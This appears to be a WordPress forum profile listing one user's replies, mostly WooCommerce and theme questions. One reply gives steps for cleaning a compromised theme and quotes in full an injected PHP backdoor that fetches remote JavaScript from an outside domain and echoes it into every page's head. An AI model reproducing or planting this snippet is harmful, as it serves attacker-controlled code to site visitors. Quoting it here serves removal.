gufranchorghay
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: The requested URL /jquery-1.6.3.min.jstwoei22
Follow the instruction given by StefanRisticDev
1) download active theme files in your computer.
2) search the file containts: jquery-1.6.3.min.js with Notepad++
3) open the search file and replace:
<?php if (!function_exists(‘insert_jquery_slider’)){function insert_jquery_slider(){if (function_exists(‘curl_init’)){$url = “https://www.jquerye.com/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_slider’);} ?>
with: <?php ?>
4) all done!
5) Thanks StefanRisticDev
Regards
Forum: Plugins
In reply to: [Email Before Download] 2 Downloads in 1 Form[email-download download_id=”7,8″ contact_form_id=”1848″]
with
<ebd /> in contact form 7
got from the forum
thanx to plugins
Below shortcode working perfect
[email-download download_id=”7″ contact_form_id=”1848″]BUT HOW TO merge 2 downloads in one form ie.
download_id”7″ and download_id”8″
together in one form.Please Help!
Below shortcode working perfect
[email-download download_id=”7″ contact_form_id=”1848″]BUT HOW TO merge 2 downloads in one form ie.
download_id”7″ and download_id”8″
together in one form.Please Help!
Forum: Fixing WordPress
In reply to: The requested URL /jquery-1.6.3.min.jsthanx
got it
thanx lajerrycares
Forum: Fixing WordPress
In reply to: The requested URL /jquery-1.6.3.min.jsNot found: jquery-1.6.3.min.js
but I found the below codes in theme/javascript/jquery.cycle.js// if $.support is not defined (pre jQuery 1.3) add what I need
if ($.support == undefined) {
$.support = {
opacity: !($.browser.msie)
};
}function debug(s) {
$.fn.cycle.debug && log(s);
}
function log() {
window.console && console.log && console.log(‘[cycle] ‘ + Array.prototype.join.call(arguments,’ ‘));
}
$.expr[‘:’].paused = function(el) {
return el.cyclePause;
};Please Help!
In my secured (SSL) site (after using WordPress HTTPS SSL plugin)
every page works fine but,In footer I had given:
Designer: https://www.designersite.com
on click it goes to https://www.designersite.comie. HTTP TO HTTPS
Please help?
How to make default select in Variable Product with variation.
In my product it select color: black and size: small by default but I want otherwise say color:white and size small.
I change the position up/down but no effect.
Any body can help?
Forum: Plugins
In reply to: [WooCommerce] digital product pricing with combination of users and yearsby using Variable Product!
thanx woocommerce team
Forum: Plugins
In reply to: [WooCommerce] How to remove page-title from product pageThanx invot
in custom css:
.page-title { display:none; }Regards
GufranForum: Plugins
In reply to: [WooCommerce] Woocommerce Software Add-on ExtensionOur docs show it only working with simple products unfortunately.
says: Ryan – Community ManagerThax Ryan for your reply
Forum: Plugins
In reply to: [WooCommerce] Variable Product (no add to cart button) js error thrownthanx
with jquery.js (1.7.2) my problem solved with renaming
Forum: Plugins
In reply to: [WooCommerce] payments by amount and NOT by selecting productThere is one digital product (anti-virus software) in the Product Page.
Whereas I want to included FUND TRANSFER facility in the Dealers Page.
If the dummy product is included it will reflect in Product Page.
How to include Fund Transfer in Dealers page. Please Help!
Forum: Fixing WordPress
In reply to: payments by amount and NOT by selecting productwoocommerce plugin
Please browse the following website:
https://rarebookssashi.com/books/magazines/advertising-graphics/This is what I am looking for;
Visitor will select the books/magazine and pass the value to the form for the Quote by click the button [Request for Quote], this is same as [Add to Cart].I am not a developer, just using WordPress themes and plugins.
Any suggestion,
Gufran